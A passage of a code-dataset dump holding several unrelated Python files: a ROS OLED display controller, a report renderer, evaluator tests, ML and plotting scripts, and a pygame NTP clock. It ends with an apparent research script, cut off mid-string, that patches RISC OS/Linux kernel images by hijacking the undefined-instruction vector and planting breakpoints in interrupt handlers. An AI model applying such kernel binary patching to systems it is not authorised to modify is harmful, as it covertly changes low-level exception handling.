\"/up_down_status\"\n\tSAFETY_TOPIC = \"/safety_status\"\n\tFAILSAFE_TOPIC = \"/override_status\"\n\tGAME_TOPIC = \"/current_game\"\n\tEXPRESSION_TOPIC = \"/facial_expression\"\n\tUPPER_TOPIC = \"/upper_motors\"\n\tLOWER_TOPIC = \"/lower_motors\"\n\n\tdef __init__(self):\n\t\tself.mode_sub = rospy.Subscriber(self.MODE_TOPIC, Int16, self.mode_set)\n\t\tself.up_down_sub = rospy.Subscriber(self.UP_DOWN_TOPIC, Int16, self.up_down_set)\n\t\tself.game_sub = rospy.Subscriber(self.GAME_TOPIC, String, self.game_set)\n\t\tself.upper_sub = rospy.Subscriber(self.UPPER_TOPIC, Array, self.upper_set)\n\t\tself.lower_sub = rospy.Subscriber(self.LOWER_TOPIC, Array, self.lower_set)\n\t\tself.face_sub = rospy.Subscriber(self.EXPRESSION_TOPIC, Int16, self.face_set)\n\t\tself.safety_sub = rospy.Subscriber(self.SAFETY_TOPIC, Bool, self.safety_set)\n\t\tself.failsafe_sub = rospy.Subscriber(self.FAILSAFE_TOPIC, Int16, self.failsafe_set)\n\t\tself.mode = 1\n\t\tself.up_down = 1\n\t\tself.fs = 1\n\t\tself.game = \"None\"\n\t\tself.face = \"Neutral\"\n\t\tself.upper=[0] * 2 + [90] * 2\n\t\tself.lower=[1500] * 4\n\t\tself.safe = \"SAFE\"\n\t\tself.line = 0\n\t\tself.time = 0\n\n\tdef mode_set(self, data):\n\t\tself.mode = data.data\n\n\tdef up_down_set(self, data):\n\t\tself.up_down = data.data\n\n\tdef failsafe_set(self, data):\n\t\tself.fs = data.data\n\n\tdef safety_set(self, data):\n\t\tif data.data == True:\n\t\t\tself.safe = \"SAFE\"\n\t\telse:\n\t\t\tself.safe = \"WARNING\"\n\n\tdef upper_set(self, data):\n\t\tself.upper = data.arr\n\n\tdef lower_set(self, data):\n\t\tself.lower = data.arr\n\n\tdef game_set(self, data):\n\t\tself.game = str(data.data)\n\n\tdef face_set(self, data):\n\t\tself.face = data.data\n\t\tif self.face == 0:\n\t\t\tself.face = \"Warn\"\n\t\telif self.face == 1:\n\t\t\tself.face = \"Happy\"\n\t\telif self.face == 2:\n\t\t\tself.face = \"Neutral\"\n\t\telif self.face == 3:\n\t\t\tself.face = \"Sad\"\n\t\telif self.face == 4:\n\t\t\tself.face = \"Surprise\"\n\t\telif self.face == 5:\n\t\t\tself.face = \"Thumbs Up\"\n\n\n\tdef display(self):\n\t\tself.line = 0\n\t\twith canvas(device) as draw:\n\t\t\tself.write_text(\"M: \" + str(self.mode) + \" U/D: \" + str(self.up_down), draw)\n\t\t\tself.write_text(\"Game: \" + self.game, draw)\n\t\t\tself.write_text(\"Face: \" + str(self.face), draw)\n\n\t\t\tself.write_text(\"LA: \" + str(self.upper[:2]), draw)\n\t\t\tself.write_text(\"Servo: \" + str(self.upper[2:]), draw)\n\n\t\t\tself.write_text(\"D_Motors: \", draw)\n\t\t\tself.write_text(str(self.lower[1:3]), draw)\n\n\t\t\tself.write_text(\"Status: \" + self.safe, draw)\n\t\t\tself.write_text(\"Sensor Override: \" + str(self.fs), draw)\n\n\tdef write_text(self, text, draw): # if text is too long it returns the text with \\n\n\t\tw = font.getsize(text)[0]\n\t\th = font.getsize(text)[1]\n\t\tline_height = font.getsize(\"hg\")[1]\n\t\tlength = len(text)\n\t\tcurrent_size = 0\n\t\tbegin = 0\n\t\tnewlines = 0\n\t\tmodified_text = \"\"\n\t\tif w <= device.width:\n\t\t\tdraw.text((0, self.line), text, font=font, fill=\"white\")\n\t\t\th = font.getsize(text)[1]\n\t\t\tself.line += line_height\n\t\t\t#return 1\n\t\telse:\n\t\t\tfor i in range(length):\n\t\t\t\tcurrent_w = font.getsize(text[begin:i+1])[0]\n\t\t\t\tcurrent_h = font.getsize(text[begin:i+1])[1]\n\t\t\t\tif current_w > 128:\n\t\t\t\t\tdraw.text((0, self.line), text[begin:i], font=font, fill=\"white\")\n\t\t\t\t\th = font.getsize(text[begin:i])[1]\n\t\t\t\t\tself.line += line_height\n\t\t\t\t\tbegin = i\n\t\t\tdraw.text((0, self.line), text[begin:length+1], font=font, fill=\"white\")\n\t\t\th = font.getsize(text[begin:length+1])[1]\n\t\t\tself.line += line_height\n\nif __name__ == \"__main__\":\n\trospy.init_node(\"OLED_Screen_Controller\")\n\targs = {\"rate\": rospy.get_param(\"~rate\")}\n\tscreen = OLED()\n\tr = rospy.Rate(args[\"rate\"])\n\twhile not rospy.is_shutdown():\n\t\tscreen.display()\n\t\tr.sleep()\n","sub_path":"src/RPi/lower_pi/oled_screen_controller.py","file_name":"oled_screen_controller.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"192449018","text":"import re\n\nfrom calendar import monthrange\nfrom dateutil.parser import parse as guess_date\n\nimport jinja2\n\n\n# jinja2 filters\ndef subtract_minutes(time_hms, minute_subtrahend):\n \"\"\"\"\n jinja2 filter that subtracts given minutes from time in HH:MM:SS format\n \"\"\"\n (h, m, s) = map(int, time_hms.split(':'))\n seconds = h * 3600 + m * 60 + s - minute_subtrahend * 60\n\n h, s = divmod(seconds, 3600)\n m, s = divmod(s, 60)\n\n return \"%02d:%02d:%02d\" % (h, m, s)\n\n\ndef render(some_date, ledger, template):\n year_month = guess_date(some_date).strftime('%Y-%m')\n start_date = re.sub(r'(\\d{4})-(\\d{2}).*', r'\\1-\\2-01', year_month)\n last_day_of_month = monthrange(*map(int, year_month.split('-')[:2]))[1]\n end_date = re.sub(r'(\\d{4})-(\\d{2}).*', r'\\1-\\2-{}', year_month) \\\n .format(last_day_of_month)\n\n try:\n template_env = jinja2.Environment(loader=jinja2.PackageLoader('bundyclock', 'templates'))\n template_env.filters['lunch'] = subtract_minutes\n template = template_env.get_template(template)\n except jinja2.exceptions.TemplateNotFound:\n template_env = jinja2.Environment(loader=jinja2.FileSystemLoader(searchpath=\"./\"))\n template_env.filters['lunch'] = subtract_minutes\n template = template_env.get_template(template)\n\n context = dict(\n month=end_date,\n total_month=ledger.get_total_report(start_date, end_date),\n workdays=ledger.get_month(year_month)\n )\n rendered_report = template.render(context)\n\n return rendered_report\n","sub_path":"bundyclock/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"214633322","text":"from pytest import mark, raises, fixture\n\nfrom evaluator import evaluate, define_function, UserFunction\nimport errors\n\n\ndef test_evaluate_number():\n got = evaluate({}, 7)\n assert 7 == got\n\n\n@mark.parametrize(\"ast, value\", [\n (['+', 1, 2], 3),\n (['*', 6, ['+', 3, 4]], 42),\n (['/', ['*', ['-', 100, 32], 5], 9], 37)\n])\ndef test_expression(ast, value):\n got = evaluate({}, ast)\n assert value == got\n\n\ndef test_evaluate_undefined_variable():\n ast = 'x'\n with raises(errors.UndefinedVariable) as excinfo:\n evaluate({}, ast)\n assert \"Undefined variable: 'x'.\" == str(excinfo.value)\n\n\ndef test_set_global():\n # backup global_environment\n import evaluator\n initial_globals = evaluator.global_environment\n evaluator.global_environment = {}\n # test\n ast = ['set', 'test_set_var', ['/', 6, 2]]\n want_name = 'test_set_var'\n want_value = 3\n empty_env = {}\n got = evaluate(empty_env, ast)\n assert want_value == got\n assert len(empty_env) == 0\n assert want_name in evaluator.global_environment\n assert want_value == evaluator.global_environment[want_name]\n # restore global_environment\n evaluator.global_environment = initial_globals\n\n\n@mark.parametrize(\"ast ,want\", [\n (['if', 1, 2, 3], 2),\n (['if', 0, 2, 3], 3),\n # (if (> 1 0) 2 (/ 3 0))\n (['if', ['>', 1, 0], 2, ['/', 3, 0]], 2),\n])\ndef test_evaluate_if(ast, want):\n got = evaluate({}, ast)\n assert want == got\n\n\ndef test_print(capsys):\n ast = ['print', 7]\n got = evaluate({}, ast)\n assert 7 == got\n captured = capsys.readouterr()\n assert '7\\n' == captured.out\n\n\ndef test_begin(capsys):\n ast = ['begin',\n ['print', 1],\n ['print', 2],\n ['print', 3]\n ]\n got = evaluate({}, ast)\n assert 3 == got\n captured = capsys.readouterr()\n assert '1\\n2\\n3\\n' == captured.out\n\n\ndef test_while_false(capsys):\n ast = ['while', 0, ['print', 9]]\n got = evaluate({}, ast)\n assert 0 == got\n captured = capsys.readouterr()\n assert len(captured.out) == 0\n\n\ndef test_while(capsys):\n # backup global_environment\n import evaluator\n initial_globals = evaluator.global_environment\n evaluator.global_environment = {}\n # test\n ast = ['begin',\n ['set', 'x', 3],\n ['while', 'x',\n ['begin',\n ['print', 'x'],\n ['set', 'x', ['-', 'x', 1]]\n ]]]\n got = evaluate({}, ast)\n assert 0 == got\n captured = capsys.readouterr()\n assert '3\\n2\\n1\\n' == captured.out\n # restore global_environment\n evaluator.global_environment = initial_globals\n\n\ndef test_define_function():\n # backup function_definitions\n import evaluator\n initial_fundefs = evaluator.function_definitions\n evaluator.function_definitions = {}\n # test\n parts = ['double', ['n'], ['*', 'n', 2]]\n want_name = 'double'\n want_formals = ['n']\n want_body = ['*', 'n', 2]\n got = define_function(parts)\n assert '' == got\n new_func = evaluator.function_definitions[want_name]\n assert want_name == new_func.name\n assert want_formals == new_func.formals\n assert want_body == new_func.body\n # restore function_definitions\n evaluator.function_definitions = initial_fundefs\n\n\n@fixture\ndef mod_body():\n return ['-', 'm', ['*', 'n', ['/', 'm', 'n']]]\n\n\ndef test_user_function_repr(mod_body):\n func = UserFunction('mod', ['m', 'n'], mod_body)\n assert '' == repr(func)\n\n\ndef test_user_function_call(mod_body):\n func = UserFunction('mod', ['m', 'n'], mod_body)\n got = func(17, 5)\n assert 2 == got\n\n\ndef test_evaluate_undefined_function():\n ast = ['spam', 99]\n with raises(errors.UndefinedFunction) as excinfo:\n evaluate({}, ast)\n assert \"Undefined function: 'spam'.\" == str(excinfo.value)\n\n\ndef test_apply_user_function():\n # backup function_definitions\n import evaluator\n initial_fundefs = evaluator.function_definitions\n evaluator.function_definitions = {}\n # test\n parts = 'triple', ['n'], ['*', 'n', 3]\n define_function(parts)\n ast = ['triple', 7]\n assert 21 == evaluate({}, ast)\n # restore function_definitions\n evaluator.function_definitions = initial_fundefs\n","sub_path":"plain/SubPascalHappyPaths/evaluator_test.py","file_name":"evaluator_test.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"417354905","text":"from sklearn import datasets \nfrom scipy.constants.constants import alpha\n\ndiabetes = datasets.load_diabetes()\nX_train = diabetes.data[:-20]\ny_train = diabetes.target[:-20]\n\nX_test = diabetes.data[-20:]\ny_test = diabetes.target[-20:]\n\nfrom sklearn import linear_model\nlinear_regr = linear_model.LinearRegression()\nlinear_regr.fit(X_train, y_train)\n\nprint(linear_regr.predict(X_test))\nprint(y_test)\n\n#shrinkage \nimport numpy as np\nX = np.c_[0.5, 1.0].T\nprint(X)\ny = np.c_[0.5, 1].T\nprint(y)\ntest = np.c_[0, 2].T\nprint(test)\n\nlinear_regr = linear_model.LinearRegression()\n\n#import pylab as pl\nimport matplotlib.pyplot as plt\n#pl.figure()\n\nnp.random.seed(0)\nfor _ in range(6):\n this_X = 0.1*np.random.normal(size=(2,1)) + X\n linear_regr.fit(this_X, y)\n plt.plot(test, linear_regr.predict(test))\n plt.scatter(this_X, y, s=3)\nplt.show()\n \n#Ridge Regression\nlinear_regr = linear_model.Ridge(alpha=0.1)\nnp.random.seed(0)\nfor _ in range(6):\n this_X = 0.1*np.random.normal(size=(2,1)) + X\n linear_regr.fit(this_X, y)\n plt.plot(test, linear_regr.predict(test))\n plt.scatter(this_X, y, s=3)\nplt.show() \n\n#Lasso\nlinear_regr = linear_model.Lasso()\nalphas = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\nscores = [linear_regr.set_params(alpha=alpha).fit(X_train, y_train).score(X_test, y_test) for alpha in alphas]\nbest_alpha = alphas[scores.index(max(scores))]\nalpha = best_alpha \nlinear_regr.fit(X_train, y_train)\nprint(linear_regr.coef_)\n\n\n\n\n\n\n\n\n\n\n\n \n \n ","sub_path":"Tutorial-'SupervisedLearning/linearRegr.py","file_name":"linearRegr.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"107350731","text":"import pandas as pd \n#read file\ndata = pd.read_csv(\"cityhall.csv\")\n#print(data.head)\n#select column 1\ndt = data.iloc[:,0]\n#print(dt)\n#split column \ndt = dt.str.split(' ', expand=True)\n#print(dt)\n\n#change data type\ndt.iloc[:,0] = dt.iloc[:,0].astype('datetime64[ns]')\ndt.iloc[:,1] = dt.iloc[:,1].astype('datetime64[ns]')\n\n#print(dt.iloc[:,0].dt.year)\ndf = pd.concat([dt.iloc[:,0].dt.year,\n dt.iloc[:,0].dt.month,\n dt.iloc[:,0].dt.dayofweek,\n dt.iloc[:,1].dt.hour]\n , axis = 1)\n\ndata = pd.concat([data, df], axis = 1)\nprint(data.head)\n\n\n#drop out\ndata = data.drop(['DateTime_Measured'], axis=1)\ndata.columns = ['Total_Demand_KW', 'year', 'month', 'dayofweek', 'hour']\n\n#save\ndata.to_csv('cityhall_clean.csv', index=False)\n","sub_path":"rawdata.py","file_name":"rawdata.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"262895258","text":"import os\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\nimport matplotlib.patches as mpatches\n\nstyle.use('fivethirtyeight')\nfig = plt.figure()\nplt2 = plt.twinx()\nax = fig.add_subplot(1,1,1)\nax2 = fig.add_subplot(1,1,1)\n\n\ndef animate(i):\n xs = []\n ys = []\n zs = []\n es = []\n ss = []\n\n plt.clf()\n\n plt.xlabel('Episode')\n plt.ylabel('steps')\n\n #plt2.ylabel('Reward')\n\n graph_data = open(os.getcwd() + '\\graph.cache', 'r')\n\n index = mpatches.Patch( linewidth=0.5, label='Q-Learning α=0.8, γ=0.75, ε=0.9')\n plt.legend(handles=[index])\n\n for line in graph_data.readlines():\n if len(line) > 1:\n line = line.strip()\n x, y, z, e, s = line.split(',')\n xs.insert(len(xs), int(x))\n ys.insert(len(ys), int(y))\n zs.insert(len(zs), float(z))\n es.insert(len(es), float(e))\n ss.insert(len(ss), int(s))\n plt.plot(xs, ys, linewidth=1) # steps\n #plt.plot(xs, zs, linewidth=1) # rewards\n #plt.plot(xs, es, linewidth=1) # epsilon\n\nanimate(1)\nplt.show()","sub_path":"Exchange-RL-Agent/tool/States.pyw","file_name":"States.pyw","file_ext":"pyw","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"216094934","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport time\nimport logging\n\nimport pygame\nfrom pygame.locals import *\n\n# from PySide2 import QtCore, QtGui, QtWidgets\n\n\nfrom ntp import NTPClient\nimport process_mon\n\n\nNTP_SERVER_LIST = [\n \"ntp.nict.jp\"\n # , \"ntp.jst.mfeed.ad.jp\"\n # , \"time.cloudflare.com\"\n , \"time.google.com\"\n # , \"ats1.e-timing.ne.jp\"\n # , \"s2csntp.miz.nao.ac.jp\"\n]\n\nTIMEZONE = +9\n\nIS_FULLSCREEN = True\nFRAME_RATE = 20\nSCREEN_WIDTH = 1920\nSCREEN_HEIGHT = 1080\n\nCOLOR_BG = 0x394552\nCOLOR_FONT = 0xE1EBF5\nCOLOR_BOLD = 0xF7665C\nCOLOR_INFO = 0xB4C43B\n\n\ndef main():\n logging.basicConfig(level=logging.DEBUG)\n\n process_monitor = process_mon.ProcessMonitor()\n\n ntp_client = NTPClient(NTP_SERVER_LIST, TIMEZONE)\n ntp_client.sync()\n\n pygame.init()\n\n # Initialize screen\n display_info = pygame.display.Info()\n screen_bitsize = display_info.bitsize\n scrreen_width = display_info.current_w\n scrreen_height = display_info.current_h\n\n display_driver = pygame.display.get_driver()\n\n logging.info(f\"Pygame: display_driver={display_driver}\")\n # print(display_info)\n\n screen_flags = pygame.DOUBLEBUF\n if IS_FULLSCREEN:\n screen_flags |= pygame.FULLSCREEN | pygame.HWSURFACE\n else:\n screen_flags |= pygame.RESIZABLE\n\n screen = pygame.display.set_mode((scrreen_width, scrreen_height), screen_flags, screen_bitsize)\n screen_2 = pygame.display.set_mode((scrreen_width, scrreen_height), screen_flags, screen_bitsize)\n pygame.display.set_caption(\"NTPClock\")\n\n clock = pygame.time.Clock()\n\n # Initialize fonts\n main_date_font = pygame.font.SysFont(None, 190)\n main_clock_font = pygame.font.SysFont(None, 320)\n main_sec_font = pygame.font.SysFont(None, 240)\n fps_font = pygame.font.SysFont(None, 64)\n\n accumulation_fps = []\n avg_fps = 0.0\n fps = 0.0\n one_sec_timer = time.time()\n last_sync_time = time.time()\n\n process_monitor.start()\n\n while True:\n if time.time() - last_sync_time > 3600.0:\n ntp_client.sync()\n\n # 時刻レンダリング\n frame_start_time = time.time()\n\n current_dt = ntp_client.get_datetime()\n\n current_date_str = current_dt.strftime(\"%Y/%m/%d(%a)\")\n current_clock_str = current_dt.strftime(\"%H:%M\")\n current_sec_str = f\"{current_dt.second:02d}.{str(current_dt.microsecond)[0:1]}\"\n\n main_date_render = main_date_font.render(current_date_str, False, get_rgb(COLOR_FONT))\n main_clock_render = main_clock_font.render(current_clock_str, False, get_rgb(COLOR_FONT))\n main_sec_render = main_sec_font.render(current_sec_str, False, get_rgb(COLOR_FONT))\n\n main_date_size_w, main_date_size_h = main_date_font.size(current_date_str)\n main_clock_size_w, main_clock_size_h = main_clock_font.size(current_clock_str)\n main_sec_size_w, main_sec_size_h = main_sec_font.size(current_sec_str)\n\n\n # FPSレンダリング\n fps_render = fps_font.render(f\"{avg_fps:.02f} FPS\", False, get_rgb(0x00FF00))\n\n # ================================================================\n # イベント処理\n # ================================================================\n for event in pygame.event.get(): # 終了処理\n if event.type == pygame.QUIT:\n pygame.quit()\n os._exit(0)\n\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.locals.K_ESCAPE:\n pygame.quit()\n os._exit(0)\n\n # ================================================================\n # Draw\n # ================================================================\n screen.fill(get_rgb(COLOR_BG))\n\n screen.blit(main_date_render, (int(scrreen_height - (main_date_size_w / 2)), 80))\n screen.blit(main_clock_render, (int(scrreen_height - (main_clock_size_w / 2) - (main_sec_size_w / 2) - 16), scrreen_height / 2 - 60))\n screen.blit(main_sec_render, (int(scrreen_height - (main_sec_size_w / 2) + (main_clock_size_w / 2) + 16), (scrreen_height / 2 - 60) + main_clock_size_h - main_sec_size_h))\n\n screen.blit(fps_render, (5, 5))\n\n pygame.display.flip()\n\n\n # ================================================================\n # FPS計測\n # ================================================================\n frame_time = time.time() - frame_start_time\n\n fps = 1.0 / (frame_time)\n accumulation_fps.append(fps)\n\n if time.time() - one_sec_timer > 1.0:\n one_sec_timer = time.time()\n if len(accumulation_fps):\n avg_fps = sum(accumulation_fps) / len(accumulation_fps)\n\n # pygame.display.set_caption(f\"NTPClock [FPS: {fps:.02f}, Avg.: {avg_fps:.02f}]\")\n\n # ================================================================\n # VSYNC\n # ================================================================\n vsync_wait = 1.0 / FRAME_RATE\n\n if vsync_wait > frame_time:\n time.sleep(vsync_wait - frame_time)\n\n time.sleep(0.05)\n\n process_monitor.process_message()\n\n\ndef get_rgb(hex):\n r = hex >> 16 & 0xFF\n g = hex >> 8 & 0xFF\n b = hex >> 0 & 0xFF\n return (r, g, b)\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"246924659","text":"#!/usr/bin/python3\n\nimport vm\nimport re\nimport os\nimport sys\nos.environ['LIBCAPSTONE_PATH'] = os.path.join(os.path.dirname(__file__), \"capstone\")\n\nimport keystone.bindings.python.keystone as keystone\nimport capstone.bindings.python.capstone as capstone\n\n# however, kernel image on Raspberry Pi is stripped-header raw image, we lost all the relocation info (virtual address mapping).\n# The good part is we have a complete physical memory dump and register info. Thus, we can recover the memory mapping by re-walking the page table.\n\n\n# https://www.riscosopen.org/wiki/documentation/show/HAL%20OS%20layout%20and%20headers\n# /Source/Kernel/hdr/OSEntries\n# RISC OS rom image format:\n# 0 ~ 0x10000 HAL\n# 0x10000 OS image base\n\n# Regards to the Risc OS source code syntax, Ref: http://www.riscos.com/support/developers/asm/index.html\n# And also: https://www.riscosopen.org/wiki/documentation/show/A%20BASIC%20guide%20to%20ObjAsm\n\n# NOTE: Risc OS overrides undefined instruction vector for floating point instruction emulation at a later stage of bootstrap\n# the location of instrumentation (`breakpoints`) should be chosen carefully, so that the time when breakpoints are reached,\n# the undefined instruction vector should be already patched to the FPE (floating point emulation) handler\n# also NOTE: that conditional flag bits might also affected, so should not instrument at `tst`, `cmp` instructions etc.\n\n\ndef patching(raw, offset, patch, addr=0):\n encoding, count = ks.asm(patch.encode(), addr)\n print([hex(c) for c in encoding])\n print(len(encoding))\n print(count)\n origin_bytes = raw[offset:offset+len(encoding)]\n print(origin_bytes)\n return (encoding, origin_bytes)\n\ndef b2pat(bstr):\n return b\"\".join([\"\\\\x{:02x}\".format(c).encode('latin-1') for c in bstr])\n\ndef align(va, alignment=4):\n ra = (va+alignment-1)&(~(alignment-1))\n return ra, ra-va\n\n\n# e.g. `./patch_riscos.py riscpi.reg riscpi.mem RISCOS.IMG 0x30000000 new.img`\nif len(sys.argv) < 5:\n print(\"Usage: patch.py [reg file] [mem dump] [kernel img] [min log storage vaddr]\")\n sys.exit()\n\nkernel_base = int(sys.argv[4], 16)\nprint(\"kernel base: \", hex(kernel_base))\nwith open(sys.argv[3], 'rb') as fd:\n kernel_data = fd.read()\nmm = vm.VM(sys.argv[1], sys.argv[2])\nvma = mm.walk()\n\ncs = capstone.Cs(capstone.CS_ARCH_ARM, capstone.CS_MODE_ARM|capstone.CS_MODE_LITTLE_ENDIAN)\n\nund_off = 4\nund_va = None\nmain_patch_vaddr = None\nmain_patch_off = None\nmain_patch_size = 0\nstorage_vaddr = None\nstorage_size = 0\nfor va, pa, sz, prot in vma:\n if va == 0xffff0000:\n excp_vec = mm._read(pa, 0x20)\n for i in cs.disasm(excp_vec, 0):\n print(i)\n #print(hex(mm._read_word(mm.translate(0xffff0018+8+0x418))))\n #for i in cs.disasm(mm._read(mm.translate(0xfc012900), 0x20), 0xfc012900):\n # print(i)\n #sys.exit()\n i = next(cs.disasm(excp_vec[4:8], va + und_off)) # entry for _und\n print(i, hex(pa))\n if (i.mnemonic == \"b\"): # Linux\n und_va = int(i.op_str[1:], 16)\n possible_patch = [m.start() for m in re.finditer(excp_vec, kernel_data)]\n assert(len(possible_patch) == 1)\n elif (i.mnemonic == \"ldr\"): # RiscPi\n print(i.op_str)\n op = re.search(\"pc, \\[pc, #(0x[0-9a-fA-F]+)\\]\", i.op_str).group(1)\n print(op)\n und_va = mm._read_word(mm.translate(i.address+8+int(op,16)))\n print(hex(und_va))\n und_va = mm._read_word(pa+i.address-va+8+int(op,16))\n print(\"addr: \", hex(und_va), hex(mm.translate(und_va)))\n i = next(cs.disasm(mm._read(mm.translate(und_va), 4), und_va))\n print (\" => \", i)\n assert (i.mnemonic == \"ldr\")\n op = re.search(\"pc, \\[pc, #(0x[0-9a-fA-F]+)\\]\", i.op_str).group(1)\n print(op)\n und_va = mm._read_word(mm.translate(i.address)+8+int(op,16))\n print(\"addr: \", hex(und_va), hex(mm.translate(und_va)))\n i = next(cs.disasm(mm._read(mm.translate(und_va), 4), und_va))\n print (\" ==> \", i)\n assert (i.mnemonic == \"ldr\")\n op = re.search(\"pc, \\[pc, #((0x)?[\\-0-9a-fA-F]+)\\]\", i.op_str).group(1)\n print(op)\n assert (\"0x\" not in op)\n und_va = mm._read_word(mm.translate(i.address)+8+int(op))\n print(\"addr: \", hex(und_va), hex(mm.translate(und_va)))\n if prot.check_exec() and va > kernel_base:\n page = mm._read(pa, sz)\n for nullpad in re.finditer(b\"(\\xff+)\", page):\n # bid for the largest null padding\n if len(nullpad.group()) > 0x100 and main_patch_size < len(nullpad.group()):\n print(\"exec: \", [hex(va+x) for x in nullpad.span()])\n sig = mm._read(pa, nullpad.start())\n koff = kernel_data.find(sig)\n print(len(sig))\n print(hex(koff))\n if len(sig) > 0 and koff != -1:\n main_patch_off, adj = align(koff+nullpad.start())\n main_patch_size = len(nullpad.group()) - adj\n main_patch_vaddr = va+nullpad.start() + adj\n # hopefully, something safe\n if prot.check_write() and va > kernel_base and ((va^kernel_base)>>24) == 0:\n page = mm._read(pa, sz)\n for nullpad in re.finditer(b\"(\\x00+)\", page):\n if len(nullpad.group()) > 0x100 and storage_size < len(nullpad.group()):\n print(\"data: \", [hex(va+x) for x in nullpad.span()])\n storage_vaddr, adj = align(va+nullpad.start())\n storage_size = len(nullpad.group()) - adj\n\nassert(und_va)\n# RiscOS: va -> pa -> kernel img offset\n# 0xfc000000 0x3bb00000 0\n# 0xfc4f3b30 0x3bff3b30 0x4f3b30 : End of ROM Image (\\xff) padding (for 2/4/6/8 MB alignment)\nprint(\"patch exec: \", hex(main_patch_vaddr), hex(mm.translate(main_patch_vaddr)))\n\n# Find initial und handler to patch a trampline\nund_handle = None\nund_off = mm.translate(und_va)\nprint(hex(und_off))\nsig = mm._read(und_off, 0x1000)\nfor i in cs.disasm(sig, und_va):\n print (i)\n # check when overwrites pc\n if i.op_str.startswith(\"pc,\"):\n sig = sig[:i.address-und_va+i.size]\n break\n\nund_kernimg_off = None\nfor match in re.finditer(b2pat(sig), kernel_data):\n print([hex(x) for x in match.span()])\n assert (not und_kernimg_off)\n und_kernimg_off = match.start()\nassert(und_kernimg_off)\nprint(hex(und_kernimg_off))\n\n#sys.exit()\n\n# Start patching\npatchset = {}\nks = keystone.Ks(keystone.KS_ARCH_ARM, keystone.KS_MODE_ARM|keystone.KS_MODE_LITTLE_ENDIAN)\n\n# Define breakpoints\n# REed: iDev_GPU_Timer1, iDev_GPU_VCDMA2, iDev_GPU_DMA4, iDev_GPU_DMA5, iDev_GPU_DMA8, iDev_GPU_DMA9, iDev_GPU_DMA10, iDev_GPU_DMA11_14(shared irq), iDev_GPU_HostPort, iDev_GPU_SMI, iDev_GPU_SDIO, iDev_GPU_Uart, iDev_ARM_Timer, iDev_ARM_Mbx, iDev_ARM_DBell0\nbreakpoints = [0xfc012ce0, 0x20049dbc, 0x20049e2c, 0x20049e9c, 0x20049f0c, 0x20049f7c, 0x20049fec, 0x2004a1ac, 0xfc207944, 0xfc2356c4, 0x200a38f4, 0xfc30742c, 0xfc2358b8, 0xfc1f58bc, 0xfc225910]\n# Dummy: IRQ\nbreakpoints.append(0xfc012c34)\n\noldbytes = []\nfor bp in breakpoints:\n kern_off = None\n off = mm.translate(bp)\n print(hex(off))\n sig = mm._read(off, 0x20)\n\n # Fixing for Linux, avoid `bl __gnu_mcount_nc`, which is dynamically patched to `ldm sp!, {lr}` in memory dump\n for i in cs.disasm(sig, bp):\n print(i)\n if i.mnemonic == \"ldm\" and i.op_str == \"sp!, {lr}\":\n sig = sig[:i.address-bp]\n break\n\n print(b2pat(sig))\n for match in re.finditer(b2pat(sig), kernel_data):\n print(\" >\", hex(bp), \" : \", [hex(x) for x in match.span()])\n # page offset should match with the virtual address\n if match.start()&mm.page_mask(bp) == bp&mm.page_mask(bp) or \\\n (0x8000+match.start())&mm.page_mask(bp) == bp&mm.page_mask(bp): # Raspi kernel base might starts at 0x8000\n assert (not kern_off) # should have only one match\n kern_off = match.start()\n # some might not be aligned (e.g. RiscOS)\n if not kern_off:\n for match in re.finditer(b2pat(sig), kernel_data):\n print(\" >>\", hex(bp), \" : \", [hex(x) for x in match.span()])\n assert (not kern_off)\n kern_off = match.start()\n\n assert (kern_off) # should find the match now\n oldbytes.append(\",\".join([hex(c) for c in kernel_data[kern_off:kern_off+4]]))\n print(\"DEBUG\")\n print(oldbytes[-1])\n print(kernel_data[kern_off:kern_off+4])\n patchset[kern_off] = patching(kernel_data, kern_off, \".word 0xe7fddef1\")\n #patchset[kern_off+4] = patching(kernel_data, kern_off+4, \"b $.;\")\n\n#sys.exit()\n\n# Patch und excp stub\n# patch excp_und dispatch table: __und_svc\n#patch_off = vector_base_off + 4\n#patchset[patch_off] = patching(binary_data, patch_off, \"b $+{}\".format(0x12c0))\n#patch_off = vector_base_off + 0x11d4 # __und_svc vector\n#patchset[patch_off] = patching(kernel_data, patch_off, \".word {}\".format(hex(main_patch_vaddr)))\npatch_off = und_kernimg_off\npatchset[patch_off] = patching(kernel_data, patch_off,\n #\"b $.;\"\n #\"stmdb sp!, {{r0-r3}};\"\n #\"mrc p15, 0, r0, c1, c0, 0;\"\n #\"tst r0, #1;\"\n \"ldr pc, $.Ldispat;\"\n \".Ldispat:\"\n \".word {DISPATCH_VADDR};\".format(\n DISPATCH_VADDR=hex(main_patch_vaddr),\n DISPATCH_PADDR=hex(mm.translate(main_patch_vaddr)),\n ), und_va)\ntramp_orig_bytes = patchset[patch_off][1]\ntramp_orig_rest = und_va + len(tramp_orig_bytes)\n\n#print(hex(und_va))\n#print(hex(und_kernimg_off))\n#sys.exit()\n\n# Patch main dispatcher\npatch_off = main_patch_off\npatchset[patch_off] = patching(kernel_data, patch_off,\n #\"mrs r0, cpsr;\"\n #\"eor r0, r0, #8;\"\n ##\"orr r0, r0, #c0;\" # keep irq disabled or redisable irq\n #\"msr spsr_cxsf, r0;\"\n #\"adr r0, .Lhandle;\"\n #\"movs pc, r0;\" # get back to UND mode\n 